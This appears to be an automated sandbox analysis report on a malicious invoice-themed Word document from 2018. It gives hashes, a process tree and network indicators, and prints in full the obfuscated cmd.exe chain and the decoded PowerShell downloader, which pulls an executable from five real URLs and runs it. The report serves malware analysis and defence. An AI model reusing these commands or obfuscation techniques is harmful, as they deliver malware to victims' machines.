File name: | Inv_201812182ZC84963.doc |
Full analysis: | https://app.any.run/tasks/53b7fe4f-86e6-4d27-8b39-1f0440bf1a33 |
Verdict: | Malicious activity |
Analysis date: | December 18, 2018, 09:12:21 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 17 21:25:00 2018, Last Saved Time/Date: Mon Dec 17 21:25:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 34, Security: 0 |
MD5: | D63197394740B144B9539F5C5BA616A0 |
SHA1: | B1B2F055AB76297CCD02759C021B4BB02AAFDA1C |
SHA256: | ADE6D13788AAC307697C79E69EEB832B9887A82CA2950AD87C6C5678C5579513 |
SSDEEP: | 1536:lI681ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvad2lYPkkVpwRJr0XbF3+Dh8b8:lI68GhDS0o9zTGOZD6EbzCdMiwT1h8b |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:17 21:25:00 |
ModifyDate: | 2018:12:17 21:25:00 |
Pages: | 1 |
Words: | 5 |
Characters: | 34 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 38 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2820 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Roaming\Inv_201812182ZC84963.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3256 | c:\HDjzASw\dXUoDSp\rQWBhXVQZ\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set 5k0=DjEYwUizYplXvvcpzfiFOfohJ\:e'ASG,K{1L}TQnm8tykgx/WNB+ ZaI6P2@5;M$d.C4()0s9r=7b-u&&for %f in (64;30;1;31;75;28;50;55;10;28;62;64;20;45;21;75;40;27;4;78;22;77;1;27;14;43;53;50;27;43;66;49;27;77;67;10;18;27;40;43;62;64;1;31;15;75;28;23;43;43;15;26;48;48;4;4;4;66;21;79;40;43;27;10;22;66;14;22;41;48;61;42;30;35;47;24;71;73;60;23;43;43;15;26;48;48;4;4;4;66;72;23;22;79;43;68;41;79;72;18;14;66;14;22;41;48;33;45;43;68;67;5;58;13;11;59;60;23;43;43;15;26;48;48;55;65;13;79;72;43;27;14;23;66;14;22;41;48;10;61;2;14;55;41;38;0;44;60;23;43;43;15;26;48;48;4;4;4;66;14;27;27;27;43;4;23;66;22;74;46;48;5;54;4;23;76;2;56;49;0;57;60;23;43;43;15;26;48;48;4;4;4;66;46;41;10;72;22;21;43;4;55;74;27;66;14;22;41;48;18;43;38;54;56;40;27;61;63;28;66;30;15;10;18;43;69;28;60;28;70;62;64;19;4;79;75;28;8;8;18;28;62;64;58;72;36;53;75;53;28;73;76;61;28;62;64;38;39;72;75;28;51;18;30;28;62;64;29;38;19;75;64;27;40;13;26;43;27;41;15;52;28;25;28;52;64;58;72;36;52;28;66;27;47;27;28;62;21;22;74;27;55;14;23;69;64;13;56;14;53;18;40;53;64;1;31;15;70;34;43;74;44;34;64;20;45;21;66;0;22;4;40;10;22;55;65;19;18;10;27;69;64;13;56;14;32;53;64;29;38;19;70;62;64;11;4;11;75;28;41;41;20;28;62;56;21;53;69;69;31;27;43;78;56;43;27;41;53;64;29;38;19;70;66;10;27;40;46;43;23;53;78;46;27;53;42;71;71;71;71;70;53;34;56;40;13;22;45;27;78;56;43;27;41;53;64;29;38;19;62;64;1;36;18;75;28;29;49;56;28;62;77;74;27;55;45;62;37;37;14;55;43;14;23;34;37;37;64;16;4;16;75;28;19;55;14;28;62;86)do set ZH=!ZH!!5k0:~%f,1!&&if %f==86 powershell "!ZH:~-458!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3800 | CmD /V/C"set 5k0=DjEYwUizYplXvvcpzfiFOfohJ\:e'ASG,K{1L}TQnm8tykgx/WNB+ ZaI6P2@5;M$d.C4()0s9r=7b-u&&for %f in (64;30;1;31;75;28;50;55;10;28;62;64;20;45;21;75;40;27;4;78;22;77;1;27;14;43;53;50;27;43;66;49;27;77;67;10;18;27;40;43;62;64;1;31;15;75;28;23;43;43;15;26;48;48;4;4;4;66;21;79;40;43;27;10;22;66;14;22;41;48;61;42;30;35;47;24;71;73;60;23;43;43;15;26;48;48;4;4;4;66;72;23;22;79;43;68;41;79;72;18;14;66;14;22;41;48;33;45;43;68;67;5;58;13;11;59;60;23;43;43;15;26;48;48;55;65;13;79;72;43;27;14;23;66;14;22;41;48;10;61;2;14;55;41;38;0;44;60;23;43;43;15;26;48;48;4;4;4;66;14;27;27;27;43;4;23;66;22;74;46;48;5;54;4;23;76;2;56;49;0;57;60;23;43;43;15;26;48;48;4;4;4;66;46;41;10;72;22;21;43;4;55;74;27;66;14;22;41;48;18;43;38;54;56;40;27;61;63;28;66;30;15;10;18;43;69;28;60;28;70;62;64;19;4;79;75;28;8;8;18;28;62;64;58;72;36;53;75;53;28;73;76;61;28;62;64;38;39;72;75;28;51;18;30;28;62;64;29;38;19;75;64;27;40;13;26;43;27;41;15;52;28;25;28;52;64;58;72;36;52;28;66;27;47;27;28;62;21;22;74;27;55;14;23;69;64;13;56;14;53;18;40;53;64;1;31;15;70;34;43;74;44;34;64;20;45;21;66;0;22;4;40;10;22;55;65;19;18;10;27;69;64;13;56;14;32;53;64;29;38;19;70;62;64;11;4;11;75;28;41;41;20;28;62;56;21;53;69;69;31;27;43;78;56;43;27;41;53;64;29;38;19;70;66;10;27;40;46;43;23;53;78;46;27;53;42;71;71;71;71;70;53;34;56;40;13;22;45;27;78;56;43;27;41;53;64;29;38;19;62;64;1;36;18;75;28;29;49;56;28;62;77;74;27;55;45;62;37;37;14;55;43;14;23;34;37;37;64;16;4;16;75;28;19;55;14;28;62;86)do set ZH=!ZH!!5k0:~%f,1!&&if %f==86 powershell "!ZH:~-458!"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3676 | powershell "$SjG='Nal';$Okf=new-object Net.WebClient;$jGp='http://www.funtelo.com/58S1xJ09@http://www.shout4music.com/Kkt4CUPvX2@http://advustech.com/l5EcamTDy@http://www.ceeetwh.org/UZwh7EIWD6@http://www.gmlsoftware.com/itTZIne5M'.Split('@');$Fwu='YYi';$PsL = '975';$TQs='BiS';$ATF=$env:temp+'\'+$PsL+'.exe';foreach($vIc in $jGp){try{$Okf.DownloadFile($vIc, $ATF);$XwX='mmO';If ((Get-Item $ATF).length -ge 80000) {Invoke-Item $ATF;$jLi='AWI';break;}}catch{}}$zwz='Fac';" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2820 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8A25.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2820 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6D472794.wmf | — | |
MD5:— | SHA256:— | |||
2820 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AAABB6C2.wmf | — | |
MD5:— | SHA256:— | |||
3676 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FFSIEBTY74TSP6NAKZTG.temp | — | |
MD5:— | SHA256:— | |||
2820 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\~$v_201812182ZC84963.doc | pgc | |
MD5:24C98AAB87F806763E95FF6BED2CE793 | SHA256:FC984ACA76125C1194FA6D31EDEE8478FD47D69B39D2042DECAA16E4233E52D2 | |||
2820 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Inv_201812182ZC84963.doc.LNK | lnk | |
MD5:E3A095F88C31341FFAC0B8AB95D4455E | SHA256:3989EE4A7F11D7515BF15ADC9FE55189F58C9DBF5A03A5E7E07DED5F4168FF3E | |||
2820 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7FBFC1F.wmf | wmf | |
MD5:6552FAFA5881CDBEBC9A955FAEA4C595 | SHA256:4B37A50873D200021E60C452DCDB40EF374DA8AAA4DCF81FF8AEC8CAB710814F | |||
2820 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:41379A924454D4DBF21EC8153C20C10F | SHA256:0C15CF2B44D7D8698623838B4214E135CD0F5B33F8FE0D860DBE04AB98A65B80 | |||
3676 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2820 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C3D5FA85.wmf | wmf | |
MD5:559365C365D68B3A1171A81D77B4492D | SHA256:AEB83AFFFE25D9C15B1A0CF7A7F82ED45400AF7A5D1B3194FBA29EBFD76F8357 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3676 | powershell.exe | GET | 404 | 109.203.99.114:80 | http://www.shout4music.com/Kkt4CUPvX2 | GB | xml | 345 b | malicious |
3676 | powershell.exe | GET | 404 | 192.185.2.61:80 | http://www.funtelo.com/58S1xJ09 | US | xml | 345 b | malicious |
3676 | powershell.exe | GET | 404 | 74.208.53.56:80 | http://advustech.com/l5EcamTDy | US | xml | 345 b | malicious |
3676 | powershell.exe | GET | 404 | 184.106.55.45:80 | http://www.ceeetwh.org/UZwh7EIWD6 | US | xml | 345 b | malicious |
3676 | powershell.exe | GET | 404 | 69.89.31.222:80 | http://www.gmlsoftware.com/itTZIne5M | US | xml | 345 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3676 | powershell.exe | 192.185.2.61:80 | www.funtelo.com | CyrusOne LLC | US | malicious |
3676 | powershell.exe | 109.203.99.114:80 | www.shout4music.com | Simply Transit Ltd | GB | malicious |
3676 | powershell.exe | 74.208.53.56:80 | advustech.com | 1&1 Internet SE | US | malicious |
3676 | powershell.exe | 184.106.55.45:80 | www.ceeetwh.org | Liquid Web, L.L.C | US | malicious |
3676 | powershell.exe | 69.89.31.222:80 | www.gmlsoftware.com | Unified Layer | US | malicious |
Domain | IP | Reputation |
---|---|---|
www.funtelo.com |
| malicious |
www.shout4music.com |
| malicious |
advustech.com |
| malicious |
www.ceeetwh.org |
| malicious |
www.gmlsoftware.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3676 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3676 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3676 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3676 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3676 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3676 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3676 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3676 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3676 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3676 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |